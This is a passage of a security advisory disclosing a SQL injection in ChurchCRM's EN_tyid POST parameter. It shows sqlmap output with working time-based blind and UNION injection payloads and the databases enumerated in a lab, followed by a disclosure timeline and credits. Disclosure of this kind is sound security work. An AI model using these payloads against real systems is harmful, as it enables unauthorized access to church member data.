    sqlmap resumed the following injection point(s) from stored session: 
    --- 
    Parameter: EN_tyid (POST) 
        Type: time-based blind 
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) 
        Payload: EN_tyid=4' AND (SELECT 8001 FROM (SELECT(SLEEP(5)))vpfX) AND 'KFAy'='KFAy&Action=Edit 
        Type: UNION query 
        Title: Generic UNION query (NULL) - 9 columns 
        Payload: EN_tyid=-8227' UNION ALL SELECT NULL,CONCAT(0x7162766a71,0x58587254614b525a474f487269586c6d55424859667574764267587a484c79595a78496f66665959,0x7178706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&Action=Edit 
    --- 
    [10:42:29] [INFO] the back-end DBMS is MySQL 
    web application technology: Apache 2.4.48, PHP 7.3.30 
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) 
    [10:42:29] [INFO] fetching database names 
    [10:42:31] [INFO] retrieved: 'information_schema' 
    [10:42:32] [INFO] retrieved: 'test' 
    [10:42:33] [INFO] retrieved: 'churchcrm' 
    available databases [3]:                                                     
    [*] churchcrm 
    [*] information_schema 
    [*] test 
    [10:42:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.11.170'                                           
    [*] ending @ 10:42:33 /2021-09-16/
    

**Disclosure Timeline**

I had reached out immediately to the vendor via email on 2021-09-16, who never replied to my request. Following a responsible disclosure approach, I decided to file for a CVE and ultimately disclose the vulnerability publicly.

The overall timeline for disclosing this vulnerability was as follows:

*   2021-09-16: Vulnerability discovered
*   2021-09-16: Vulnerability reported to the manufacturer
*   2022-05-02: CVE has been reserved
*   2022-05-14: Public disclosure of the vulnerability

**Credits**

This security vulnerability was found by Alexander Bilz.

*   E-Mail: mail\[at\]alexbilz.com
*   Public Key: https://www.alexbilz.com/ABilz.asc
*   Key ID: 0X474CECFD3DBC6880
*   Key Fingerprint: 6C0E A8D0 C428 ED1D 8C2E C4A0 474C ECFD 3DBC 6880

**Disclaimer**

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated to provide as accurate information as possible.

**References**

1.  Product website for ChurchCRM http://churchcrm.io/ ↩︎
    
2.  ChurchCRM CRM Sourcecode https://github.com/ChurchCRM/CRM ↩︎
    
3.  Link to sqlmap https://sqlmap.org/ ↩︎

Tag

#chrome